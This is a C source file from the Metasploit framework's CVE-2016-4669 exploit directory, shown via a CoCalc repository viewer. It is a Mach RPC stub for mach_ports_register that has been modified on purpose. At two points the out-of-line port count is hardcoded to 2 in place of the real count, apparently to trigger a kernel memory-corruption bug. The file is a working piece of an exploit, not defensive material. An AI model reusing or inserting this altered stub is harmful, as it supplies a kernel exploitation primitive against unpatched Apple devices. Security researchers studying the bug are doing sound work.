CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/external/source/exploits/CVE-2016-4669/task.c
Views: 11780
1
#include "__task.h"

2


3
#ifndef	UseStaticTemplates

4
#define	UseStaticTemplates	0

5
#endif	/* UseStaticTemplates */

6


7
#ifndef	__MachMsgErrorWithoutTimeout

8
#define	__MachMsgErrorWithoutTimeout(_R_) { \

9
	switch (_R_) { \

10
	case MACH_SEND_INVALID_DATA: \

11
	case MACH_SEND_INVALID_DEST: \

12
	case MACH_SEND_INVALID_HEADER: \

13
		mig_put_reply_port(InP->Head.msgh_reply_port); \

14
		break; \

15
	default: \

16
		mig_dealloc_reply_port(InP->Head.msgh_reply_port); \

17
	} \

18
}

19
#endif	/* __MachMsgErrorWithoutTimeout */

20


21
#ifndef	__AfterSendRpc

22
#define	__AfterSendRpc(_NUM_, _NAME_)

23
#endif	/* __AfterSendRpc */

24


25
#ifndef	__BeforeSendRpc

26
#define	__BeforeSendRpc(_NUM_, _NAME_)

27
#endif	/* __BeforeSendRpc */

28


29
#define msgh_request_port	msgh_remote_port

30
#define msgh_reply_port		msgh_local_port

31


32
#ifndef	mig_internal

33
#define	mig_internal	static __inline__

34
#endif	/* mig_internal */

35


36
#ifndef	mig_external

37
#define mig_external

38
#endif	/* mig_external */

39


40
#if	!defined(__MigTypeCheck) && defined(TypeCheck)

41
#define	__MigTypeCheck		TypeCheck	/* Legacy setting */

42
#endif	/* !defined(__MigTypeCheck) */

43


44
#ifndef	__DeclareSendRpc

45
#define	__DeclareSendRpc(_NUM_, _NAME_)

46
#endif	/* __DeclareSendRpc */

47


48
mig_internal kern_return_t __MIG_check__Reply__mach_ports_register_t(__Reply__mach_ports_register_t *Out0P)

49
{

50


51
	typedef __Reply__mach_ports_register_t __Reply __attribute__((unused));

52
	if (Out0P->Head.msgh_id != 3503) {

53
	    if (Out0P->Head.msgh_id == MACH_NOTIFY_SEND_ONCE)

54
		{ return MIG_SERVER_DIED; }

55
	    else

56
		{ return MIG_REPLY_MISMATCH; }

57
	}

58


59
#if	__MigTypeCheck

60
	if ((Out0P->Head.msgh_bits & MACH_MSGH_BITS_COMPLEX) ||

61
	    (Out0P->Head.msgh_size != (mach_msg_size_t)sizeof(__Reply)))

62
		{ return MIG_TYPE_ERROR ; }

63
#endif	/* __MigTypeCheck */

64


65
	{

66
		return Out0P->RetCode;

67
	}

68
}

69


70
/* Routine mach_ports_register */

71
mig_external kern_return_t __mach_ports_register

72
(

73
	task_t target_task,

74
	mach_port_array_t init_port_set,

75
	mach_msg_type_number_t init_port_setCnt

76
)

77
{

78


79
#ifdef  __MigPackStructs

80
#pragma pack(4)

81
#endif

82
	typedef struct {

83
		mach_msg_header_t Head;

84
		/* start of the kernel processed data */

85
		mach_msg_body_t msgh_body;

86
		mach_msg_ool_ports_descriptor_t init_port_set;

87
		/* end of the kernel processed data */

88
		NDR_record_t NDR;

89
		mach_msg_type_number_t init_port_setCnt;

90
	} Request __attribute__((unused));

91
#ifdef  __MigPackStructs

92
#pragma pack()

93
#endif

94


95
#ifdef  __MigPackStructs

96
#pragma pack(4)

97
#endif

98
	typedef struct {

99
		mach_msg_header_t Head;

100
		NDR_record_t NDR;

101
		kern_return_t RetCode;

102
		mach_msg_trailer_t trailer;

103
	} Reply __attribute__((unused));

104
#ifdef  __MigPackStructs

105
#pragma pack()

106
#endif

107


108
#ifdef  __MigPackStructs

109
#pragma pack(4)

110
#endif

111
	typedef struct {

112
		mach_msg_header_t Head;

113
		NDR_record_t NDR;

114
		kern_return_t RetCode;

115
	} __Reply __attribute__((unused));

116
#ifdef  __MigPackStructs

117
#pragma pack()

118
#endif

119
	/*

120
	 * typedef struct {

121
	 * 	mach_msg_header_t Head;

122
	 * 	NDR_record_t NDR;

123
	 * 	kern_return_t RetCode;

124
	 * } mig_reply_error_t;

125
	 */

126


127
	union {

128
		Request In;

129
		Reply Out;

130
	} Mess;

131


132
	Request *InP = &Mess.In;

133
	Reply *Out0P = &Mess.Out;

134


135
	mach_msg_return_t msg_result;

136


137
#ifdef	__MIG_check__Reply__mach_ports_register_t__defined

138
	kern_return_t check_result;

139
#endif	/* __MIG_check__Reply__mach_ports_register_t__defined */

140


141
	__DeclareSendRpc(3403, "mach_ports_register")

142


143
#if	UseStaticTemplates

144
	const static mach_msg_ool_ports_descriptor_t init_port_setTemplate = {

145
		/* addr = */		(void *)0,

146
		/* coun = */		0,

147
		/* deal = */		FALSE,

148
		/* copy is meaningful only in overwrite mode */

149
		/* copy = */		MACH_MSG_PHYSICAL_COPY,

150
		/* disp = */		19,

151
		/* type = */		MACH_MSG_OOL_PORTS_DESCRIPTOR,

152
	};

153
#endif	/* UseStaticTemplates */

154


155
	InP->msgh_body.msgh_descriptor_count = 1;

156
#if	UseStaticTemplates

157
	InP->init_port_set = init_port_setTemplate;

158
	InP->init_port_set.address = (void *)(init_port_set);

159
	InP->init_port_set.count = 2; // was init_port_setCnt;

160
#else	/* UseStaticTemplates */

161
	InP->init_port_set.address = (void *)(init_port_set);

162
	InP->init_port_set.count = 2; // was init_port_setCnt;

163
	InP->init_port_set.disposition = 19;

164
	InP->init_port_set.deallocate =  FALSE;

165
	InP->init_port_set.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;

166
#endif	/* UseStaticTemplates */

167


168


169
	InP->NDR = NDR_record;

170


171
	InP->init_port_setCnt = init_port_setCnt;

172


173
	InP->Head.msgh_bits = MACH_MSGH_BITS_COMPLEX|

174
		MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);

175
	/* msgh_size passed as argument */

176
	InP->Head.msgh_request_port = target_task;

177
	InP->Head.msgh_reply_port = mig_get_reply_port();

178
	InP->Head.msgh_id = 3403;

179
	

180
/* BEGIN VOUCHER CODE */

181


182
#ifdef USING_VOUCHERS

183
	if (voucher_mach_msg_set != NULL) {

184
		voucher_mach_msg_set(&InP->Head);

185
	}

186
#endif // USING_VOUCHERS

187
	

188
/* END VOUCHER CODE */

189


190
	__BeforeSendRpc(3403, "mach_ports_register")

191
	msg_result = mach_msg(&InP->Head, MACH_SEND_MSG|MACH_RCV_MSG|MACH_MSG_OPTION_NONE, (mach_msg_size_t)sizeof(Request), (mach_msg_size_t)sizeof(Reply), InP->Head.msgh_reply_port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);

192
	__AfterSendRpc(3403, "mach_ports_register")

193
	if (msg_result != MACH_MSG_SUCCESS) {

194
		__MachMsgErrorWithoutTimeout(msg_result);

195
		{ return msg_result; }

196
	}

197


198


199
#if	defined(__MIG_check__Reply__mach_ports_register_t__defined)

200
	check_result = __MIG_check__Reply__mach_ports_register_t((__Reply__mach_ports_register_t *)Out0P);

201
	if (check_result != MACH_MSG_SUCCESS)

202
		{ return check_result; }

203
#endif	/* defined(__MIG_check__Reply__mach_ports_register_t__defined) */

204


205
	return KERN_SUCCESS;

206
}

207


208